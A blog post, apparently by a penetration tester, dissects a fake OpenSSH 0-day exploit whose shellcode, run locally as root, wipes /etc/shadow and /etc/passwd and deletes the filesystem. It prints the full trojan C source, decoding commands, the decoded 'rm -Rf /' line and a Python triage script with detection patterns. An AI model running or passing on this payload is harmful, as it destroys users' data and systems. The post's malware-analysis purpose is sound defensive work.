Analyzing a shellcode is always instructive: it gives the penetration tester hints about what the code contains, teaches them the techniques it uses, and, just as importantly, keeps them from running a destructive shellcode by mistake.
After a few searches on the Internet I found a pastebin page to illustrate my example.
The following page (here) claims to offer a 0-day exploit for OpenSSH 5.7. It gives no instructions and simply displays a short C program to compile with GCC on a Linux machine. Below you can see the code:
```c
/*
 openSSH 5.7 0day exploit
 Off by One error in auth2-pubkey.c
 Author: Chroniccommand
 Usage: ./exploit
 greetz to _st4ck3d*, x3n0n, xin etc you know who you are ;)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>

void usage(char *argv[])
{
    printf("Usage: %s \n", argv[0]);
    exit(1);
}

/* The "payload": this is the part analysed below. */
unsigned char shellcode[] =
    "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
    "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
    "\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
    "\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
    "\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
    "\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
    "\xcd\x80";

int main(int argc, char *argv[])
{
    int uid = getuid();
    int port = 22, sock;
    struct hostent *host;
    struct sockaddr_in addr;

    if(uid != 0) {
        fprintf(stderr, "[!!]Error: You must be root\n");
        exit(1);
    }
    if(uid == 0) {
        printf("\t[+]Starting exploit..\n");
    }
    if(argc != 3)
        usage(argv);

    /* Note the order: nothing is ever sent to the target. The program casts
       the shellcode array to a function pointer and runs it on the LOCAL
       machine (as root, see the check above), then exits. */
    fprintf(stderr, "[!!]Exploit failed\n");
    (*(void(*)())shellcode)();
    exit(1);

    /* Everything below is dead code that only makes the file look like a
       real remote exploit: sock and addr are never even initialised. */
    char payload[1024];
    memcpy(payload, &shellcode, sizeof(shellcode));
    if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) {
        printf("[+]Got shell\n");
        system("/bin/sh");
    } else if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
        fprintf(stderr, "[!!]Exploit failed\n");
        exit(1);
    }
}
```
At first glance the exploit looks fine, and I guess a lot of people ran it on their own machine without ever looking inside it. Before executing it, this is what they should have done, and it is what you should always do!
- Analyse it without executing it
Below you can see how to reverse the shellcode with Perl or Python:
```sh
$ perl -e 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1\xcd\x80"' > exploit
$ strings exploit
```
or in Python (the bytes must be written raw, not as a text string):
```sh
$ python3 -c 'import sys; sys.stdout.buffer.write(b"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1\xcd\x80")' > exploit
$ strings exploit
```
And this is the result that you should obtain:
```
Rfh-c
h/sh
h/bin
echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf /
```
As the output above shows, the shellcode first empties /etc/shadow and /etc/passwd and then runs `rm -Rf /` on our hard drive, deleting everything!
That is why it is important to always reverse the shellcodes you are using beforehand!
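The same analysis as the Perl/strings pipeline above, as an added Python 3 example that is not part of the original post: it decodes the `\xNN` literal copied from the fake exploit, pulls out printable runs the way strings(1) does, and flags the destructive commands it finds, all without writing a file or executing a single byte. The `DESTRUCTIVE` pattern list and the function names are my own choices, not anything from the pastebin.

```python
import re

# Constructed input: the shellcode literal copied from the fake "exploit"
# above, kept as escaped text so that nothing here is ever executed.
SHELLCODE_LITERAL = (
    r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
    r"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
    r"\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
    r"\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
    r"\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
    r"\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
    r"\xcd\x80"
)

# Red flags worth refusing to run a "proof of concept" over (hypothetical
# starter list; extend it for your own triage).
DESTRUCTIVE = {
    "recursive_rm": r"\brm\s+-[A-Za-z]*[rR]",
    "overwrite_shadow": r">\s*/etc/shadow",
    "overwrite_passwd": r">\s*/etc/passwd",
}


def decode_c_escapes(literal: str) -> bytes:
    """Turn the \\xNN escapes of a C string literal into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", literal))


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """What strings(1) does: maximal runs of printable ASCII, min_len or longer."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def triage(literal: str, min_len: int = 4) -> dict:
    """Static look at a shellcode literal: size, strings and red flags."""
    data = decode_c_escapes(literal)
    found = extract_strings(data, min_len)
    flags = [name for name, pat in DESTRUCTIVE.items()
             if any(re.search(pat, s) for s in found)]
    if b"\xcd\x80" in data:  # int 0x80: a Linux x86 system call
        flags.append("linux_x86_syscall")
    return {"size": len(data), "strings": found, "flags": sorted(flags)}


if __name__ == "__main__":
    report = triage(SHELLCODE_LITERAL)
    print(f"{report['size']} bytes, flags: {report['flags']}")
    for s in report["strings"]:
        print(" ", s)
```

The `h/sh` and `h/bin` lines are not noise: 0x68 is the x86 `push imm32` opcode, so strings(1) is showing the pieces of `/bin/sh` that the code pushes onto the stack before the `int 0x80` syscall.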